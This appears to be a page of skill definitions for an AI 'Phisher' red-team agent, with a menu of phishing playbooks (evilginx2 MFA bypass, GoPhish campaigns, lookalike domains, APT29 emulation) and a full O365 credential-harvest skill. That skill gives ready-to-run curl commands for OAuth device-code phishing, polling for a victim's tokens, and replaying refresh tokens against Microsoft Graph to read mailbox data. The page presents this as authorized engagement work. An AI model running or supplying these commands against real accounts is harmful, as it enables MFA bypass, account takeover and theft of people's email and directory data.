Menu
Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts.
Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.
Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
Register and provision a lookalike / Punycode phishing domain with DNS and TLS so GoPhish and evilginx2 lures resolve and pass modern mail + browser checks.
Design a credible phishing pretext and target shortlist from OSINT before any campaign is built — sender persona, scenario, timing, and the minimal target set.
Phishing / social-engineering catalog for the Phisher agent. Use ONLY when the engagement RoE authorizes a phishing engagement. Covers pretext design, GoPhish campaigns, evilginx2 MFA-bypass proxying, O365 credential/token harvest, lookalike domains, and the mandatory blue-team deconfliction handshake.
APT29 (Cozy Bear / Midnight Blizzard, SVR) adversary-emulation playbook — malware-light cloud-identity espionage: no-MFA password spray, OAuth consent/token abuse, Golden SAML, mailbox collection over residential proxies. Use when emulating APT29 against an M365/Entra/AWS-identity estate. Triggers on: 'emulate APT29', 'Cozy Bear', 'Midnight Blizzard', 'NOBELIUM', 'OAuth abuse', 'cloud identity espionage', 'Golden SAML'.
| name | o365-credential-harvest |
| description | Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts. |
| metadata | {"subdomain":"phishing","when_to_use":"o365 phishing, entra id, oauth device code, token replay, tokentactics, microsoft 365 credential harvest, illicit consent","mitre_attack":["T1566.002","T1528","T1550.001","T1621"],"tags":["phishing","o365","oauth","token-replay"]} |
Two Microsoft-identity initial-access paths that avoid a fake password page: the device-code flow and token replay. Both are favored because the victim authenticates on the genuine Microsoft endpoint.
The attacker requests a device code; the victim is social-engineered
to enter it at the real microsoft.com/devicelogin. After they
complete sign-in (MFA included), the attacker polls and receives
access + refresh tokens.
TENANT=common
CLIENT=d3590ed6-52b3-4102-aeff-aad2292ab01c # Office client id (example)
# 1. request a device code
curl -s https://login.microsoftonline.com/$TENANT/oauth2/v2.0/devicecode \
-d "client_id=$CLIENT&scope=https://graph.microsoft.com/.default offline_access" | tee dc.json
# -> user_code + verification_uri go into the lure ("enter this code at ...")
# 2. poll for the token after the victim signs in
DC=$(jq -r .device_code dc.json)
curl -s https://login.microsoftonline.com/$TENANT/oauth2/v2.0/token \
-d "grant_type=urn:ietf:params:oauth:grant-type:device_code&client_id=$CLIENT&device_code=$DC"
A refresh token captured here (or via evilginx2-proxy) is exchanged
for access tokens against Graph, Outlook, SharePoint, Teams — each a
distinct resource scope — without re-auth.
RT=<captured-refresh-token>
curl -s https://login.microsoftonline.com/common/oauth2/v2.0/token \
-d "grant_type=refresh_token&client_id=$CLIENT&refresh_token=$RT&scope=https://graph.microsoft.com/.default"
# use the returned access_token: Authorization: Bearer <token> against graph.microsoft.com
A token is interesting; a Graph call returning the victim's mailbox /
directory data is the finding:
curl -s -H "Authorization: Bearer $AT" https://graph.microsoft.com/v1.0/me.
Tokens → Credential nodes (type oauth-token, with scope + expiry)
linked to the User node. Store ONLY under evidence/phisher/ + the
knowledge graph.
lure-deconfliction handshake.plan/roe.json:data_handling.